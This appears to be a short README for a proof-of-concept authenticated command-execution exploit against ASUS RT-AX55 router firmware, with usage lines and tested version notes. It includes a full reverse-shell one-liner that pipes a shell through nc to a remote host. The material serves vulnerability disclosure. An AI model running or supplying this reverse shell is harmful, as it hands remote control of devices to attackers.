usage: exploit.py [-h] --url URL --credentials CREDENTIALS --cmd CMD
The exploit requires authentication. Read the full blogpost.
The code was tested against the following firmware version:
- ASUS RT-AX55 Firmware version 3.0.0.4.386.51598
Different firmwares/daemons could have a different offset for the SystemCmd global variable, fix the script accordingly.
The PoC script execute commands and reports their output using other authenticated endpoints.
However a reverse shell can be obtained by executing the following: rm -f /tmp/f; mknod /tmp/f p; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.42.102.133 7777 > /tmp/f
Qiling>=1.4.7 is required.
usage: emulate.py